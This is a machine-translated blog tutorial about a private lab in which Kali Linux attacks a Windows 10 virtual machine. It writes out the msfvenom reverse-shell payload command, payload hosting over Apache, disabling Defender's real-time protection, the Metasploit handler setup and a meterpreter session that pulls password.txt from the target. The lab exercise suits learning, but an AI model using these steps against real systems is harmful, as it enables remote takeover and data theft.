Ich möchte die Angriffsmethode kennen und eine Person mit hohem Sicherheitsbewusstsein werden. Weil es vor dem Gebäude ist, sind Hacker cool, oder? Ich fing an, das Hacken mit dem Motiv zu üben.
Es ist der 4. Tag des Adventskalenders von PRO Co., Ltd. Es geht nicht darum, etwas zu machen, aber bitte verzeihen Sie mir, dass ich gesagt habe "Ich wünschte, ich hätte es!" ...
Erstellen Sie eine experimentelle Windows-Umgebung mit VM, Angriff und Fernsteuerung aus einer anderen Umgebung (Kali Linux). Es ist länger, aber es gibt mehr Bilder.
In diesem Artikel werden Cyberangriffe wie nicht autorisierter Zugriff nicht empfohlen. Bitte wenden Sie die hier vorgestellten Inhalte nicht auf die externe Umgebung an.
Erstellen Sie zunächst das Angriffsterminal und das Zielterminal mit VM. Diesmal wurde es in der folgenden Umgebung durchgeführt.
Kali Linux ist eine Linux-Distribution, die für Penetrationstests verwendet wird. Es basiert auf Debian und ist mit über 300 Penetrationstest-Tools vorinstalliert.
Ich werde dieses Mal Kali Linux verwenden, aber es ist in Ordnung, das Angriffstool auf dem Betriebssystem zu installieren, mit dem Sie vertraut sind.
Laden Sie das Kali Linux-Image von der folgenden Seite herunter. https://www.kali.org/downloads/ Dieses Mal habe ich "Kali Linux 64-Bit" heruntergeladen.
In diesem Artikel werde ich die detaillierte Installationsmethode weglassen.
Laden Sie die Windows 10-ISO-Datei von der folgenden Seite herunter. https://www.microsoft.com/ja-jp/software-download/windows10ISO
Erstellen Sie eine virtuelle Maschine aus einer neuen VirtualBox. Es ist fertig.
--Entfernen Sie die ISO-Datei vom virtuellen Laufwerk Beenden Sie Windows 10 einmal und öffnen Sie VirtualBox-Einstellungen> Speicher. Klicken Sie auf das Festplattensymbol rechts neben dem optischen Laufwerk und wählen Sie Festplatte vom virtuellen Laufwerk entfernen.
Du bist bereit zu gehen!
Dieses Angriffsexperiment wird in der folgenden Umgebung durchgeführt. Das Angriffsterminal und das Zielterminal sollten sich im selben Netzwerk befinden.
Terminal | IP Adresse |
---|---|
Kali Linux (Angriffsterminal) | 10.0.0.2 |
Windows10 (Zielterminal) | 10.0.0.102 |
Erstellen Sie mit dem Metasploit Framework eine Reverse Shell und führen Sie sie auf dem Zielgerät aus.
Es handelt sich um ein Open-Source-Penetrationstest-Tool, das eine Reihe von Servereinbrüchen ausführen kann, z. B. Untersuchung, Eindringen, Angriff und Installation / Anschluss von Hintertüren. Es wird standardmäßig in Kali Linux bereitgestellt.
Eine Nutzlast ist ein ausführbarer Code, der sich böswillig verhält. Dieses Mal erstellen wir eine TCP-Reverse-Shell-Nutzlast.
Mit dem folgenden Befehl wird eine TCP-Reverse-Shell erstellt, die auf 64-Bit-Fenster abzielt und das Verbindungsziel als Angriffsterminal (10.0.0.2) angibt.
# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.2 -f exe -o /root/Desktop/evil.exe
Die erstellte Nutzlast muss auf irgendeine Weise vom Zielterminal ausgeführt werden. Starten Sie diesmal Apache, damit Sie über den Browser des Zielterminals darauf zugreifen können.
# mkdir /var/www/html/share
# cp /root/Desktop/evil.exe /var/www/html/share/
# service apache2 restart
Greifen Sie über den Browser auf der Windows10-Seite auf http://10.0.0.2/share zu.
Ich habe bestätigt, dass evil.exe existiert, also werde ich es herunterladen.
Als ich auf evil.exe geklickt und es ausgeführt habe, ist es fehlgeschlagen, da es von Windows Defender Antivirus als Virus erkannt wurde.
Wenn Sie auf die Benachrichtigung unten rechts klicken, werden Sie ein wenig aufgeregt sein, den Namen Troys Pferd zu sehen, das Sie gehört haben.
Als ich unter "Betrieb" "Zulassen" auswählte und erneut versuchte, es zu speichern, änderte sich die Anzeige. Klicken Sie in diesem Status zum Speichern auf Ausführen.
Deaktivieren Sie dann den "Echtzeitschutz" im Windows Defender Security Center und laden Sie ihn erneut herunter. Die detaillierte Einstellungsmethode finden Sie hier (https://121ware.com/qasearch/1007/app/servlet/relatedqa?QID=018503).
Diesmal war der Download ohne Vorwarnung erfolgreich.Wenn Sie den Ordner öffnen, sehen Sie, dass zwei Dateien vorhanden sind, eine, die gespeichert ist, wenn der Echtzeitschutz aktiviert ist (evil.exe), und eine, die gespeichert ist, wenn der Echtzeitschutz deaktiviert ist (evil (1) .exe).
Führen Sie den folgenden Befehl auf dem angreifenden Terminal aus und warten Sie auf die Verbindung durch die Reverse Shell.
# msfconsole <----Eingang
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
.,,. .
.\$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$\""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
=[ metasploit v5.0.62-dev ]
+ -- --=[ 1949 exploits - 1090 auxiliary - 334 post ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5> Exploit / Multi / Handler <---- Eingabe verwenden
msf5 Exploit (Multi / Handler)> Payload Windows / x64 / meterpreter / reverse_tcp <---- Eingabe setzen
payload => windows/x64/meterpreter/reverse_tcp
msf5 Exploit (Multi / Handler)> LHOST 10.0.0.2 <---- Eingabe setzen
LHOST=>10.0.0.2
msf5 Exploit (Multi / Handler)> Exploit -j -z <---- Eingabe
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Reverse TCP-Handler am 10.0.0.2 gestartet: 4444 <---- Hören Sie zu
msf5 exploit(multi/handler) >
###Führen Sie die Nutzdaten auf dem Zielterminal aus
Führen Sie die Nutzdaten auf der Windows-Seite aus. Der heruntergeladene, wenn der Echtzeitschutz aktiviert ist, und der heruntergeladene, wenn der Echtzeitschutz deaktiviert ist, werden insgesamt viermal im Muster des aktivierten Echtzeitschutzes ausgeführt.
[Zum Zeitpunkt des Downloads] Echtzeitschutz aktiviert (evil.exe) |
[Zum Zeitpunkt des Downloads] Echtzeitschutz deaktiviert (evil(1).exe) |
|
---|---|---|
【Laufzeit】 Echtzeitschutz aktiviert |
Angriffsfehler | Angriffsfehler |
【Laufzeit】 Echtzeitschutz deaktiviert |
Angriffsfehler | Erfolgreicher Angriff |
Alle geben zur Laufzeit eine Warnung, aber Details>Durch Ausführung zwangsweise ausführen.
Klicken Sie hier, um den Bildschirm zum Zeitpunkt des Fehlers anzuzeigen.
Bei Erfolg wird Folgendes auf der angreifenden Konsole angezeigt.
msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.0.0.102
[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.102:49975) at 2019-12-04 09:08:01 +0900
Drücken Sie in diesem Zustand die Eingabetaste und verwenden Sie dann den Befehl session, um die Sitzungsliste anzuzeigen.
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
2 meterpreter x64/windows DESKTOP-4V3PT8F\arakawa @ DESKTOP-4V3PT8F 10.0.0.2:4444 -> 10.0.0.102:49975 (10.0.0.102)
Angriffsumgebung (10.0.0.2) zur Zielumgebung (10).0.0.Die Verbindung zu 102) wurde bestätigt.
###Fernbedienung an der Meterpreter-Eingabeaufforderung
Dann Passwort für das Experiment.Erstellen Sie eine txt-Datei auf der Windows-Seite.
Zeigen Sie die Meterpreter-Eingabeaufforderung an, indem Sie die Sitzungs-ID auf der Angreiferseite angeben.
msf5 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter >
password.Suchen und laden Sie txt herunter.
meterpreter > pwd
C:\Users\arakawa\Downloads
meterpreter > ls
Listing: C:\Users\arakawa\Downloads
===================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100666/rw-rw-rw- 282 fil 2019-12-01 21:24:25 +0900 desktop.ini
100777/rwxrwxrwx 7168 fil 2019-12-04 08:21:32 +0900 evil (1).exe
100777/rwxrwxrwx 7168 fil 2019-12-04 09:07:02 +0900 evil.exe
100666/rw-rw-rw- 8 fil 2019-12-04 09:15:30 +0900 password.txt
meterpreter > download password.txt
[*] Downloading: password.txt -> password.txt
[*] Downloaded 8.00 B of 8.00 B (100.0%): password.txt -> password.txt
[*] download : password.txt -> password.txt
meterpreter >
Öffnen Sie ein anderes Terminal und stellen Sie sicher, dass Sie es herunterladen können.
root@kali:~# ls -la password.txt
-rw-r--r-- 1 root root 8 Dec 4 09:15 password.txt
Ich konnte es sicher herunterladen (?)! !!
#Zusammenfassung
Ich habe Kali Linux verwendet, um Windows 10 anzugreifen, und mit der Fernbedienung experimentiert. Es war überraschend, dass es einfacher war als ich erwartet hatte. Persönlich denke ich, dass es eine Ernte ist, zu erkennen, dass Windows Defender einen guten Job macht.
Der nächste Schritt besteht darin, eine Hintertür zu erstellen, die Nutzlast zu fälschen und vieles mehr, damit ich mehr schreiben kann.
#Nachschlagewerk